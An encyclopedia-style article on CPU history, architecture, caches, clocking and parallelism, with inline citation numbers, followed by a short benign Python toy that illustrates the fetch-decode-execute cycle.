19 Early CPUs were custom designs used as part of a larger and sometimes distinctive computer. 20 However, this method of designing custom CPUs for a particular application has largely given way to the development of multi-purpose processors produced in large quantities. This standardization began in the era of discrete transistor mainframes and minicomputers, and has rapidly accelerated with the popularization of the integrated circuit (IC). The IC has allowed increasingly complex CPUs to be designed and manufactured to tolerances on the order of nanometers. 21 Both the miniaturization and standardization of CPUs have increased the presence of digital devices in modern life far beyond the limited application of dedicated computing machines. Modern microprocessors appear in electronic devices ranging from automobiles 22 to cellphones, 23 and sometimes even in toys. 24 25 While von Neumann is most often credited with the design of the stored-program computer because of his design of EDVAC, and the design became known as the von Neumann architecture, others before him, such as Konrad Zuse, had suggested and implemented similar ideas. 26 The so-called Harvard architecture of the Harvard Mark I, which was completed before EDVAC, 27 28 also used a stored-program design using punched paper tape rather than electronic memory. 29 The key difference between the von Neumann and Harvard architectures is that the latter separates the storage and treatment of CPU instructions and data, while the former uses the same memory space for both. 30 Most modern CPUs are primarily von Neumann in design, but CPUs with the Harvard architecture are seen as well, especially in embedded applications; for instance, the Atmel AVR microcontrollers are Harvard-architecture processors. 31 Relays and vacuum tubes (thermionic tubes) were commonly used as switching elements; 32 33 a useful computer requires thousands or tens of thousands of switching devices. The overall speed of a system is dependent on the speed of the switches. Vacuum-tube computers such as EDVAC tended to average eight hours between failures, whereas relay computers—such as the slower but earlier Harvard Mark I—failed very rarely. 13 In the end, tube-based CPUs became dominant because the significant speed advantages afforded generally outweighed the reliability problems. Most of these early synchronous CPUs ran at low clock rates compared to modern microelectronic designs. Clock signal frequencies ranging from 100 kHz to 4 MHz were very common at this time, limited largely by the speed of the switching devices they were built with. 34 The design complexity of CPUs increased as various technologies facilitated the building of smaller and more reliable electronic devices. The first such improvement came with the advent of the transistor. Transistorized CPUs during the 1950s and 1960s no longer had to be built out of bulky, unreliable, and fragile switching elements, like vacuum tubes and relays. 35 With this improvement, more complex and reliable CPUs were built onto one or several printed circuit boards containing discrete (individual) components. In 1964, IBM introduced its IBM System 360 computer architecture that was used in a series of computers capable of running the same programs with different speeds and performances. 36 This was significant at a time when most electronic computers were incompatible with one another, even those made by the same manufacturer. 
To facilitate this improvement, IBM used the concept of a microprogram (often called "microcode"), which still sees widespread use in modern CPUs. 37 The System 360 architecture was so popular that it dominated the mainframe computer market for decades and left a legacy that is continued by similar modern computers like the IBM zSeries. 38 39 In 1965, Digital Equipment Corporation (DEC) introduced another influential computer aimed at the scientific and research markets—the PDP 8. 40 Transistor-based computers had several distinct advantages over their predecessors. Aside from facilitating increased reliability and lower power consumption, transistors also allowed CPUs to operate at much higher speeds because of the short switching time of a transistor in comparison to a tube or relay. 41 The increased reliability and dramatically increased speed of the switching elements, which were almost exclusively transistors by this time; CPU clock rates in the tens of megahertz were easily obtained during this period. 42 Additionally, while discrete transistor and IC CPUs were in heavy usage, new high-performance designs like single instruction, multiple data (SIMD) vector processors began to appear. 43 These early experimental designs later gave rise to the era of specialized supercomputers like those made by Cray Inc and Fujitsu Ltd. 43 During this period, a method of manufacturing many interconnected transistors in a compact space was developed. The integrated circuit (IC) allowed a large number of transistors to be manufactured on a single semiconductor-based die, or "chip". At first, only very basic non-specialized digital circuits such as NOR gates were miniaturized into ICs. 44 CPUs based on these "building block" ICs are generally referred to as "small-scale integration" (SSI) devices. SSI ICs, such as the ones used in the Apollo Guidance Computer, usually contained up to a few dozen transistors. To build an entire CPU out of SSI ICs required thousands of individual chips, but still consumed much less space and power than earlier discrete transistor designs. 45 IBM's System 370, follow-on to the System 360, used SSI ICs rather than Solid Logic Technology discrete-transistor modules. 46 47 DEC's PDP 8 I and KI10 PDP 10 also switched from the individual transistors used by the PDP 8 and PDP 10 to SSI ICs, 48 and their extremely popular PDP 11 line was originally built with SSI ICs, but was eventually implemented with LSI components once these became practical. Lee Boysel published influential articles, including a 1967 "manifesto", which described how to build the equivalent of a 32 bit mainframe computer from a relatively small number of large-scale integration circuits (LSI). 49 50 The only way to build LSI chips, which are chips with a hundred or more gates, was to build them using a metal oxide semiconductor (MOS) semiconductor manufacturing process (either PMOS logic, NMOS logic, or CMOS logic). However, some companies continued to build processors out of bipolar transistor transistor logic (TTL) chips because bipolar junction transistors were faster than MOS chips up until the 1970s (a few companies such as Datapoint continued to build processors out of TTL chips until the early 1980s). 50 In the 1960s, MOS ICs were slower and initially considered useful only in applications that required low power. 
51 52 Following the development of silicon-gate MOS technology by Federico Faggin at Fairchild Semiconductor in 1968, MOS ICs largely replaced bipolar TTL as the standard chip technology in the early 1970s. 53 As the microelectronic technology advanced, an increasing number of transistors were placed on ICs, decreasing the number of individual ICs needed for a complete CPU. MSI and LSI ICs increased transistor counts to hundreds, and then thousands. By 1968, the number of ICs required to build a complete CPU had been reduced to 24 ICs of eight different types, with each IC containing roughly 1000 MOSFETs. 54 In stark contrast with its SSI and MSI predecessors, the first LSI implementation of the PDP 11 contained a CPU composed of only four LSI integrated circuits. 55 Since microprocessors were first introduced they have almost completely overtaken all other central processing unit implementation methods. The first commercially available microprocessor, made in 1971, was the Intel 4004, and the first widely used microprocessor, made in 1974, was the Intel 8080. Mainframe and minicomputer manufacturers of the time launched proprietary IC development programs to upgrade their older computer architectures, and eventually produced instruction set compatible microprocessors that were backward-compatible with their older hardware and software. Combined with the advent and eventual success of the ubiquitous personal computer, the term CPU is now applied almost exclusively a to microprocessors. Several CPUs (denoted cores) can be combined in a single processing chip. 56 Previous generations of CPUs were implemented as discrete components and numerous small integrated circuits (ICs) on one or more circuit boards. 57 Microprocessors, on the other hand, are CPUs manufactured on a very small number of ICs; usually just one. 58 The overall smaller CPU size, as a result of being implemented on a single die, means faster switching time because of physical factors like decreased gate parasitic capacitance. 59 60 This has allowed synchronous microprocessors to have clock rates ranging from tens of megahertz to several gigahertz. Additionally, the ability to construct exceedingly small transistors on an IC has increased the complexity and number of transistors in a single CPU many fold. This widely observed trend is described by Moore's law, which had proven to be a fairly accurate predictor of the growth of CPU (and other IC) complexity until 2016. 61 62 While the complexity, size, construction and general form of CPUs have changed enormously since 1950, 63 the basic design and function has not changed much at all. Almost all common CPUs today can be very accurately described as von Neumann stored-program machines. 64 b As Moore's law no longer holds, concerns have arisen about the limits of integrated circuit transistor technology. Extreme miniaturization of electronic gates is causing the effects of phenomena like electromigration and subthreshold leakage to become much more significant. 66 67 These newer concerns are among the many factors causing researchers to investigate new methods of computing such as the quantum computer, as well as to expand the use of parallelism and other methods that extend the usefulness of the classical von Neumann model. The fundamental operation of most CPUs, regardless of the physical form they take, is to execute a sequence of stored instructions that is called a program. The instructions to be executed are kept in some kind of computer memory. 
Nearly all CPUs follow the fetch, decode and execute steps in their operation, which are collectively known as the instruction cycle. After the execution of an instruction, the entire process repeats, with the next instruction cycle normally fetching the next-in-sequence instruction because of the incremented value in the program counter. If a jump instruction was executed, the program counter will be modified to contain the address of the instruction that was jumped to and program execution continues normally. In more complex CPUs, multiple instructions can be fetched, decoded and executed simultaneously. This section describes what is generally referred to as the "classic RISC pipeline", which is quite common among the simple CPUs used in many electronic devices (often called microcontrollers). It largely ignores the important role of CPU cache, and therefore the access stage of the pipeline. Some instructions manipulate the program counter rather than producing result data directly; such instructions are generally called "jumps" and facilitate program behavior like loops, conditional program execution (through the use of a conditional jump), and existence of functions. c In some processors, some other instructions change the state of bits in a "flags" register. These flags can be used to influence how a program behaves, since they often indicate the outcome of various operations. For example, in such processors a "compare" instruction evaluates two values and sets or clears bits in the flags register to indicate which one is greater or whether they are equal; one of these flags could then be used by a later jump instruction to determine program flow. Fetch involves retrieving an instruction (which is represented by a number or sequence of numbers) from program memory. The instruction's location (address) in program memory is determined by the program counter (PC; called the "instruction pointer" in Intel x86 microprocessors), which stores a number that identifies the address of the next instruction to be fetched. After an instruction is fetched, the PC is incremented by the length of the instruction so that it will contain the address of the next instruction in the sequence. d Often, the instruction to be fetched must be retrieved from relatively slow memory, causing the CPU to stall while waiting for the instruction to be returned. This issue is largely addressed in modern processors by caches and pipeline architectures (see below). The instruction that the CPU fetches from memory determines what the CPU will do. In the decode step, performed by binary decoder circuitry known as the instruction decoder, the instruction is converted into signals that control other parts of the CPU. The way in which the instruction is interpreted is defined by the CPU's instruction set architecture (ISA). e Often, one group of bits (that is, a "field") within the instruction, called the opcode, indicates which operation is to be performed, while the remaining fields usually provide supplemental information required for the operation, such as the operands. Those operands may be specified as a constant value (called an immediate value), or as the location of a value that may be a processor register or a memory address, as determined by some addressing mode. In some CPU designs the instruction decoder is implemented as a hardwired, unchangeable binary decoder circuit. 
In others, a microprogram is used to translate instructions into sets of CPU configuration signals that are applied sequentially over multiple clock pulses. In some cases the memory that stores the microprogram is rewritable, making it possible to change the way in which the CPU decodes instructions. After the fetch and decode steps, the execute step is performed. Depending on the CPU architecture, this may consist of a single action or a sequence of actions. During each action, control signals electrically enable or disable various parts of the CPU so they can perform all or part of the desired operation. The action is then completed, typically in response to a clock pulse. Very often the results are written to an internal CPU register for quick access by subsequent instructions. In other cases results may be written to slower, but less expensive and higher capacity main memory. For example, if an instruction that performs addition is to be executed, registers containing operands (numbers to be summed) are activated, as are the parts of the arithmetic logic unit (ALU) that perform addition. When the clock pulse occurs, the operands flow from the source registers into the ALU, and the sum appears at its output. On subsequent clock pulses, other components are enabled (and disabled) to move the output (the sum of the operation) to storage (e.g., a register or memory). If the resulting sum is too large (i.e., it is larger than the ALU's output word size), an arithmetic overflow flag will be set, influencing the next operation. Hardwired into a CPU's circuitry is a set of basic operations it can perform, called an instruction set. Such operations may involve, for example, adding or subtracting two numbers, comparing two numbers, or jumping to a different part of a program. Each instruction is represented by a unique combination of bits, known as the machine language opcode. While processing an instruction, the CPU decodes the opcode (via a binary decoder) into control signals, which orchestrate the behavior of the CPU. A complete machine language instruction consists of an opcode and, in many cases, additional bits that specify arguments for the operation (for example, the numbers to be summed in the case of an addition operation). Going up the complexity scale, a machine language program is a collection of machine language instructions that the CPU executes. The actual mathematical operation for each instruction is performed by a combinational logic circuit within the CPU's processor known as the arithmetic logic unit or ALU. In general, a CPU executes an instruction by fetching it from memory, using its ALU to perform an operation, and then storing the result to memory. Besides the instructions for integer mathematics and logic operations, various other machine instructions exist, such as those for loading data from memory and storing it back, branching operations, and mathematical operations on floating-point numbers performed by the CPU's floating-point unit (FPU). 68 The control unit (CU) is a component of the CPU that directs the operation of the processor. It tells the computer's memory, arithmetic and logic unit and input and output devices how to respond to the instructions that have been sent to the processor. It directs the operation of the other units by providing timing and control signals. Most computer resources are managed by the CU. It directs the flow of data between the CPU and the other devices. 
John von Neumann included the control unit as part of the von Neumann architecture. In modern computer designs, the control unit is typically an internal part of the CPU with its overall role and operation unchanged since its introduction. 69 The arithmetic logic unit (ALU) is a digital circuit within the processor that performs integer arithmetic and bitwise logic operations. The inputs to the ALU are the data words to be operated on (called operands), status information from previous operations, and a code from the control unit indicating which operation to perform. Depending on the instruction being executed, the operands may come from internal CPU registers, external memory, or constants generated by the ALU itself. When all input signals have settled and propagated through the ALU circuitry, the result of the performed operation appears at the ALU's outputs. The result consists of both a data word, which may be stored in a register or memory, and status information that is typically stored in a special, internal CPU register reserved for this purpose. Modern CPUs typically contain more than one ALU to improve performance. The address generation unit (AGU), sometimes also called the address computation unit (ACU), 70 is an execution unit inside the CPU that calculates addresses used by the CPU to access main memory. By having address calculations handled by separate circuitry that operates in parallel with the rest of the CPU, the number of CPU cycles required for executing various machine instructions can be reduced, bringing performance improvements. While performing various operations, CPUs need to calculate memory addresses required for fetching data from the memory; for example, in-memory positions of array elements must be calculated before the CPU can fetch the data from actual memory locations. Those address-generation calculations involve different integer arithmetic operations, such as addition, subtraction, modulo operations, or bit shifts. Often, calculating a memory address involves more than one general-purpose machine instruction, which do not necessarily decode and execute quickly. By incorporating an AGU into a CPU design, together with introducing specialized instructions that use the AGU, various address-generation calculations can be offloaded from the rest of the CPU, and can often be executed quickly in a single CPU cycle. Capabilities of an AGU depend on a particular CPU and its architecture. Thus, some AGUs implement and expose more address-calculation operations, while some also include more advanced specialized instructions that can operate on multiple operands at a time. Some CPU architectures include multiple AGUs so more than one address-calculation operation can be executed simultaneously, which brings further performance improvements due to the superscalar nature of advanced CPU designs. For example, Intel incorporates multiple AGUs into its Sandy Bridge and Haswell microarchitectures, which increase bandwidth of the CPU memory subsystem by allowing multiple memory-access instructions to be executed in parallel. Many microprocessors (in smartphones and desktop, laptop, server computers) have a memory management unit, translating logical addresses into physical RAM addresses, providing memory protection and paging abilities, useful for virtual memory. Simpler processors, especially microcontrollers, usually don't include an MMU. 
A CPU cache 71 is a hardware cache used by the central processing unit (CPU) of a computer to reduce the average cost (time or energy) to access data from the main memory. A cache is a smaller, faster memory, closer to a processor core, which stores copies of the data from frequently used main memory locations. Most CPUs have different independent caches, including instruction and data caches, where the data cache is usually organized as a hierarchy of more cache levels (L1, L2, L3, L4, etc.). All modern (fast) CPUs (with few specialized exceptions f ) have multiple levels of CPU caches. The first CPUs that used a cache had only one level of cache; unlike later level 1 caches, it was not split into L1d (for data) and L1i (for instructions). Almost all current CPUs with caches have a split L1 cache. They also have L2 caches and, for larger processors, L3 caches as well. The L2 cache is usually not split and acts as a common repository for the already split L1 cache. Every core of a multi-core processor has a dedicated L2 cache and is usually not shared between the cores. The L3 cache, and higher-level caches, are shared between the cores and are not split. An L4 cache is currently uncommon, and is generally on dynamic random-access memory (DRAM), rather than on static random-access memory (SRAM), on a separate die or chip. That was also the case historically with L1, while bigger chips have allowed integration of it and generally all cache levels, with the possible exception of the last level. Each extra level of cache tends to be bigger and is optimized differently. Other types of caches exist (that are not counted towards the "cache size" of the most important caches mentioned above), such as the translation lookaside buffer (TLB) that is part of the memory management unit (MMU) that most CPUs have. Caches are generally sized in powers of two: 2, 8, 16 etc. KiB or MiB (for larger non-L1) sizes, although the IBM z13 has a 96 KiB L1 instruction cache. 72 Most CPUs are synchronous circuits, which means they employ a clock signal to pace their sequential operations. The clock signal is produced by an external oscillator circuit that generates a consistent number of pulses each second in the form of a periodic square wave. The frequency of the clock pulses determines the rate at which a CPU executes instructions and, consequently, the faster the clock, the more instructions the CPU will execute each second. To ensure proper operation of the CPU, the clock period is longer than the maximum time needed for all signals to propagate (move) through the CPU. In setting the clock period to a value well above the worst-case propagation delay, it is possible to design the entire CPU and the way it moves data around the "edges" of the rising and falling clock signal. This has the advantage of simplifying the CPU significantly, both from a design perspective and a component-count perspective. However, it also carries the disadvantage that the entire CPU must wait on its slowest elements, even though some portions of it are much faster. This limitation has largely been compensated for by various methods of increasing CPU parallelism (see below). However, architectural improvements alone do not solve all of the drawbacks of globally synchronous CPUs. For example, a clock signal is subject to the delays of any other electrical signal. Higher clock rates in increasingly complex CPUs make it more difficult to keep the clock signal in phase (synchronized) throughout the entire unit. 
This has led many modern CPUs to require multiple identical clock signals to be provided to avoid delaying a single signal significantly enough to cause the CPU to malfunction. Another major issue, as clock rates increase dramatically, is the amount of heat that is dissipated by the CPU. The constantly changing clock causes many components to switch regardless of whether they are being used at that time. In general, a component that is switching uses more energy than an element in a static state. Therefore, as clock rate increases, so does energy consumption, causing the CPU to require more heat dissipation in the form of CPU cooling solutions. One method of dealing with the switching of unneeded components is called clock gating, which involves turning off the clock signal to unneeded components (effectively disabling them). However, this is often regarded as difficult to implement and therefore does not see common usage outside of very low-power designs. One notable recent CPU design that uses extensive clock gating is the IBM PowerPC-based Xenon used in the Xbox 360; this reduces the power requirements of the Xbox 360. 73 Another method of addressing some of the problems with a global clock signal is the removal of the clock signal altogether. While removing the global clock signal makes the design process considerably more complex in many ways, asynchronous (or clockless) designs carry marked advantages in power consumption and heat dissipation in comparison with similar synchronous designs. While somewhat uncommon, entire asynchronous CPUs have been built without using a global clock signal. Two notable examples of this are the ARM compliant AMULET and the MIPS R3000 compatible MiniMIPS. 74 Rather than totally removing the clock signal, some CPU designs allow certain portions of the device to be asynchronous, such as using asynchronous ALUs in conjunction with superscalar pipelining to achieve some arithmetic performance gains. While it is not altogether clear whether totally asynchronous designs can perform at a comparable or better level than their synchronous counterparts, it is evident that they do at least excel in simpler math operations. This, combined with their excellent power consumption and heat dissipation properties, makes them very suitable for embedded computers. 75 Many modern CPUs have a die-integrated power managing module which regulates on-demand voltage supply to the CPU circuitry allowing it to keep balance between performance and power consumption. Every CPU represents numerical values in a specific way. For example, some early digital computers represented numbers as familiar decimal (base 10) numeral system values, and others have employed more unusual representations such as ternary (base three). Nearly all modern CPUs represent numbers in binary form, with each digit being represented by some two-valued physical quantity such as a "high" or "low" voltage. g Related to numeric representation is the size and precision of integer numbers that a CPU can represent. In the case of a binary CPU, this is measured by the number of bits (significant digits of a binary encoded integer) that the CPU can process in one operation, which is commonly called word size, bit width, data path width, integer precision, or integer size. A CPU's integer size determines the range of integer values on which it can directly operate. h For example, an 8 bit CPU can directly manipulate integers represented by eight bits, which have a range of 256 (28) discrete integer values. 
Integer range can also affect the number of memory locations the CPU can directly address (an address is an integer value representing a specific memory location). For example, if a binary CPU uses 32 bits to represent a memory address then it can directly address 232 memory locations. To circumvent this limitation and for various other reasons, some CPUs use mechanisms (such as bank switching) that allow additional memory to be addressed. CPUs with larger word sizes require more circuitry and consequently are physically larger, cost more and consume more power (and therefore generate more heat). As a result, smaller 4 or 8 bit microcontrollers are commonly used in modern applications even though CPUs with much larger word sizes (such as 16, 32, 64, even 128 bit) are available. When higher performance is required, however, the benefits of a larger word size (larger data ranges and address spaces) may outweigh the disadvantages. A CPU can have internal data paths shorter than the word size to reduce size and cost. For example, even though the IBM System 360 instruction set architecture was a 32 bit instruction set, the System 360 Model 30 and Model 40 had 8 bit data paths in the arithmetic logical unit, so that a 32 bit add required four cycles, one for each 8 bits of the operands, and, even though the Motorola 68000 series instruction set was a 32 bit instruction set, the Motorola 68000 and Motorola 68010 had 16 bit data paths in the arithmetic logical unit, so that a 32 bit add required two cycles. To gain some of the advantages afforded by both lower and higher bit lengths, many instruction sets have different bit widths for integer and floating-point data, allowing CPUs implementing that instruction set to have different bit widths for different portions of the device. For example, the IBM System 360 instruction set was primarily 32 bit, but supported 64 bit floating-point values to facilitate greater accuracy and range in floating-point numbers. 37 The System 360 Model 65 had an 8 bit adder for decimal and fixed-point binary arithmetic and a 60 bit adder for floating-point arithmetic. 76 Many later CPU designs use similar mixed bit width, especially when the processor is meant for general-purpose use where a reasonable balance of integer and floating-point capability is required. The description of the basic operation of a CPU offered in the previous section describes the simplest form that a CPU can take. This type of CPU, usually referred to as subscalar, operates on and executes one instruction on one or two pieces of data at a time, that is less than one instruction per clock cycle (IPC 1). This process gives rise to an inherent inefficiency in subscalar CPUs. Since only one instruction is executed at a time, the entire CPU must wait for that instruction to complete before proceeding to the next instruction. As a result, the subscalar CPU gets "hung up" on instructions which take more than one clock cycle to complete execution. Even adding a second execution unit (see below) does not improve performance much; rather than one pathway being hung up, now two pathways are hung up and the number of unused transistors is increased. This design, wherein the CPU's execution resources can operate on only one instruction at a time, can only possibly reach scalar performance (one instruction per clock cycle, IPC 1). However, the performance is nearly always subscalar (less than one instruction per clock cycle, IPC 1). 
Attempts to achieve scalar and better performance have resulted in a variety of design methodologies that cause the CPU to behave less linearly and more in parallel. When referring to parallelism in CPUs, two terms are generally used to classify these design techniques: Each methodology differs both in the ways in which they are implemented, as well as the relative effectiveness they afford in increasing the CPU's performance for an application. i One of the simplest methods for increased parallelism is to begin the first steps of instruction fetching and decoding before the prior instruction finishes executing. This is a technique known as instruction pipelining, and is used in almost all modern general-purpose CPUs. Pipelining allows multiple instruction to be executed at a time by breaking the execution pathway into discrete stages. This separation can be compared to an assembly line, in which an instruction is made more complete at each stage until it exits the execution pipeline and is retired. Pipelining does, however, introduce the possibility for a situation where the result of the previous operation is needed to complete the next operation; a condition often termed data dependency conflict. Therefore, pipelined processors must check for these sorts of conditions and delay a portion of the pipeline if necessary. A pipelined processor can become very nearly scalar, inhibited only by pipeline stalls (an instruction spending more than one clock cycle in a stage). Improvements in instruction pipelining led to further decreases in the idle time of CPU components. Designs that are said to be superscalar include a long instruction pipeline and multiple identical execution units, such as load store units, arithmetic logic units, floating-point units and address generation units. 77 In a superscalar pipeline, instructions are read and passed to a dispatcher, which decides whether or not the instructions can be executed in parallel (simultaneously). If so, they are dispatched to execution units, resulting in their simultaneous execution. In general, the number of instructions that a superscalar CPU will complete in a cycle is dependent on the number of instructions it is able to dispatch simultaneously to execution units. Most of the difficulty in the design of a superscalar CPU architecture lies in creating an effective dispatcher. The dispatcher needs to be able to quickly determine whether instructions can be executed in parallel, as well as dispatch them in such a way as to keep as many execution units busy as possible. This requires that the instruction pipeline is filled as often as possible and requires significant amounts of CPU cache. It also makes hazard-avoiding techniques like branch prediction, speculative execution, register renaming, out-of-order execution and transactional memory crucial to maintaining high levels of performance. By attempting to predict which branch (or path) a conditional instruction will take, the CPU can minimize the number of times that the entire pipeline must wait until a conditional instruction is completed. Speculative execution often provides modest performance increases by executing portions of code that may not be needed after a conditional operation completes. Out-of-order execution somewhat rearranges the order in which instructions are executed to reduce delays due to data dependencies. 
Also in case of single instruction stream, multiple data stream, a case when a lot of data from the same type has to be processed, modern processors can disable parts of the pipeline so that when a single instruction is executed many times, the CPU skips the fetch and decode phases and thus greatly increases performance on certain occasions, especially in highly monotonous program engines such as video creation software and photo processing. When a fraction of the CPU is superscalar, the part that is not suffers a performance penalty due to scheduling stalls. The Intel P5 Pentium had two superscalar ALUs which could accept one instruction per clock cycle each, but its FPU could not. Thus the P5 was integer superscalar but not floating point superscalar. Intel's successor to the P5 architecture, P6, added superscalar abilities to its floating-point features. Simple pipelining and superscalar design increase a CPU's ILP by allowing it to execute instructions at rates surpassing one instruction per clock cycle. Most modern CPU designs are at least somewhat superscalar, and nearly all general purpose CPUs designed in the last decade are superscalar. In later years some of the emphasis in designing high-ILP computers has been moved out of the CPU's hardware and into its software interface, or instruction set architecture (ISA). The strategy of the very long instruction word (VLIW) causes some ILP to become implied directly by the software, reducing the CPU's work in boosting ILP and thereby reducing design complexity. Another strategy of achieving performance is to execute multiple threads or processes in parallel. This area of research is known as parallel computing. 78 In Flynn's taxonomy, this strategy is known as multiple instruction stream, multiple data stream (MIMD). 79 One technology used for this purpose is multiprocessing (MP). 80 The initial type of this technology is known as symmetric multiprocessing (SMP), where a small number of CPUs share a coherent view of their memory system. In this scheme, each CPU has additional hardware to maintain a constantly up-to-date view of memory. By avoiding stale views of memory, the CPUs can cooperate on the same program and programs can migrate from one CPU to another. To increase the number of cooperating CPUs beyond a handful, schemes such as non-uniform memory access (NUMA) and directory-based coherence protocols were introduced in the 1990s. SMP systems are limited to a small number of CPUs while NUMA systems have been built with thousands of processors. Initially, multiprocessing was built using multiple discrete CPUs and boards to implement the interconnect between the processors. When the processors and their interconnect are all implemented on a single chip, the technology is known as chip-level multiprocessing (CMP) and the single chip as a multi-core processor. It was later recognized that finer-grain parallelism existed with a single program. A single program might have several threads (or functions) that could be executed separately or in parallel. Some of the earliest examples of this technology implemented input output processing such as direct memory access as a separate thread from the computation thread. A more general approach to this technology was introduced in the 1970s when systems were designed to run multiple computation threads in parallel. This technology is known as multi-threading (MT). 
The approach is considered more cost-effective than multiprocessing, as only a small number of components within a CPU are replicated to support MT as opposed to the entire CPU in the case of MP. In MT, the execution units and the memory system including the caches are shared among multiple threads. The downside of MT is that the hardware support for multithreading is more visible to software than that of MP and thus supervisor software like operating systems have to undergo larger changes to support MT. One type of MT that was implemented is known as temporal multithreading, where one thread is executed until it is stalled waiting for data to return from external memory. In this scheme, the CPU would then quickly context switch to another thread which is ready to run, the switch often done in one CPU clock cycle, such as the UltraSPARC T1. Another type of MT is simultaneous multithreading, where instructions from multiple threads are executed in parallel within one CPU clock cycle. For several decades from the 1970s to early 2000s, the focus in designing high performance general purpose CPUs was largely on achieving high ILP through technologies such as pipelining, caches, superscalar execution, out-of-order execution, etc. This trend culminated in large, power-hungry CPUs such as the Intel Pentium 4. By the early 2000s, CPU designers were thwarted from achieving higher performance from ILP techniques due to the growing disparity between CPU operating frequencies and main memory operating frequencies as well as escalating CPU power dissipation owing to more esoteric ILP techniques. CPU designers then borrowed ideas from commercial computing markets such as transaction processing, where the aggregate performance of multiple programs, also known as throughput computing, was more important than the performance of a single thread or process. This reversal of emphasis is evidenced by the proliferation of dual and more core processor designs and notably, Intel's newer designs resembling its less superscalar P6 architecture. Late designs in several processor families exhibit CMP, including the x86 64 Opteron and Athlon 64 X2, the SPARC UltraSPARC T1, IBM POWER4 and POWER5, as well as several video game console CPUs like the Xbox 360's triple-core PowerPC design, and the PlayStation 3's 7 core Cell microprocessor. A less common but increasingly important paradigm of processors (and indeed, computing in general) deals with data parallelism. The processors discussed earlier are all referred to as some type of scalar device. j As the name implies, vector processors deal with multiple pieces of data in the context of one instruction. This contrasts with scalar processors, which deal with one piece of data for every instruction. Using Flynn's taxonomy, these two schemes of dealing with data are generally referred to as single instruction stream, multiple data stream (SIMD) and single instruction stream, single data stream (SISD), respectively. The great utility in creating processors that deal with vectors of data lies in optimizing tasks that tend to require the same operation (for example, a sum or a dot product) to be performed on a large set of data. Some classic examples of these types of tasks include multimedia applications (images, video and sound), as well as many types of scientific and engineering tasks. 
Whereas a scalar processor must complete the entire process of fetching, decoding and executing each instruction and value in a set of data, a vector processor can perform a single operation on a comparatively large set of data with one instruction. This is only possible when the application tends to require many steps which apply one operation to a large set of data. Most early vector processors, such as the Cray 1, were associated almost exclusively with scientific research and cryptography applications. However, as multimedia has largely shifted to digital media, the need for some form of SIMD in general-purpose processors has become significant. Shortly after inclusion of floating-point units started to become commonplace in general-purpose processors, specifications for and implementations of SIMD execution units also began to appear for general-purpose processors. when? Some of these early SIMD specifications like HP's Multimedia Acceleration eXtensions (MAX) and Intel's MMX were integer-only. This proved to be a significant impediment for some software developers, since many of the applications that benefit from SIMD primarily deal with floating-point numbers. Progressively, developers refined and remade these early designs into some of the common modern SIMD specifications, which are usually associated with one instruction set architecture (ISA). Some notable modern examples include Intel's Streaming SIMD Extensions (SSE) and the PowerPC-related AltiVec (also known as VMX). k Many modern architectures (including embedded ones) often include hardware performance counters (HPC), which enables low-level (instruction-level) collection, benchmarking, debugging or analysis of running software metrics. 81 82 HPC may also be used to discover and analyze unusual or suspicious activity of the software, such as return-oriented programming (ROP) or sigreturn-oriented programming (SROP) exploits etc. 83 This is usually done by software-security teams to assess and find malicious binary programs. 84 Many major vendors (such as IBM, Intel, AMD, and Arm) provide software interfaces (usually written in C C ) that can be used to collect data from the CPU's registers in order to get metrics. 85 Operating system vendors also provide software like perf (Linux) to record, benchmark, or trace CPU events running kernels and applications. Hardware counters provide a low-overhead method for collecting comprehensive performance metrics related to a CPU's core elements (functional units, caches, main memory, etc.) a significant advantage over software profilers. 86 Additionally, they generally eliminate the need to modify the underlying source code of a program. 87 88 Because hardware designs differ between architectures, the specific types and interpretations of hardware counters will also change. Most modern CPUs have privileged modes to support operating systems and virtualization. Cloud computing can use virtualization to provide virtual central processing units 89 (vCPUs) for separate users. 90 A host is the virtual equivalent of a physical machine, on which a virtual system is operating. 91 When there are several physical machines operating in tandem and managed as a whole, the grouped computing and memory resources form a cluster. In some systems, it is possible to dynamically add and remove from a cluster. Resources available at a host and cluster level can be partitioned into resources pools with fine granularity. 
The performance or speed of a processor depends on, among many other factors, the clock rate (generally given in multiples of hertz) and the instructions per clock (IPC), which together are the factors for the instructions per second (IPS) that the CPU can perform. 92 Many reported IPS values have represented "peak" execution rates on artificial instruction sequences with few branches, whereas realistic workloads consist of a mix of instructions and applications, some of which take longer to execute than others. The performance of the memory hierarchy also greatly affects processor performance, an issue barely considered in IPS calculations. Because of these problems, various standardized tests, often called "benchmarks" for this purpose — such as SPECint — have been developed to attempt to measure the real effective performance in commonly used applications. Processing performance of computers is increased by using multi-core processors, which essentially is plugging two or more individual processors (called cores in this sense) into one integrated circuit. 93 Ideally, a dual core processor would be nearly twice as powerful as a single core processor. In practice, the performance gain is far smaller, only about 50%, due to imperfect software algorithms and implementation. 94 Increasing the number of cores in a processor (i.e. dual-core, quad-core, etc.) increases the workload that can be handled. This means that the processor can now handle numerous asynchronous events, interrupts, etc. which can take a toll on the CPU when overwhelmed. These cores can be thought of as different floors in a processing plant, with each floor handling a different task. Sometimes, these cores will handle the same tasks as cores adjacent to them if a single core is not enough to handle the information. Multi-core CPUs enhance a computer's ability to run several tasks simultaneously by providing additional processing power. However, the increase in speed is not directly proportional to the number of cores added. This is because the cores need to interact through specific channels, and this inter-core communication consumes a portion of the available processing speed. 95 Due to specific capabilities of modern CPUs, such as simultaneous multithreading and uncore, which involve sharing of actual CPU resources while aiming at increased utilization, monitoring performance levels and hardware use gradually became a more complex task. 96 As a response, some CPUs implement additional hardware logic that monitors actual use of various parts of a CPU and provides various counters accessible to software; an example is Intel's Performance Counter Monitor technology. 9 |
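The CPU entry above walks through the fetch, decode, and execute steps of the instruction cycle. Purely as an illustration of that loop, here is a toy Python sketch; the opcodes and the two-register machine are invented for demonstration and do not model any real instruction set.

# Toy illustration of the fetch-decode-execute cycle described in the entry above.
program = [
    ("LOAD", "r0", 5),    # r0 = 5
    ("LOAD", "r1", 7),    # r1 = 7
    ("ADD", "r0", "r1"),  # r0 = r0 + r1
    ("HALT",),
]

registers = {"r0": 0, "r1": 0}
pc = 0  # program counter

while True:
    instruction = program[pc]        # fetch: read the instruction at the PC
    opcode, *operands = instruction  # decode: split the opcode from its operands
    pc += 1                          # point the PC at the next instruction in sequence

    # execute: dispatch on the opcode
    if opcode == "LOAD":
        reg, value = operands
        registers[reg] = value
    elif opcode == "ADD":
        dst, src = operands
        registers[dst] = registers[dst] + registers[src]
    elif opcode == "JUMP":
        (target,) = operands
        pc = target                  # jumps overwrite the PC instead of incrementing it
    elif opcode == "HALT":
        break

print(registers)  # {'r0': 12, 'r1': 7}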
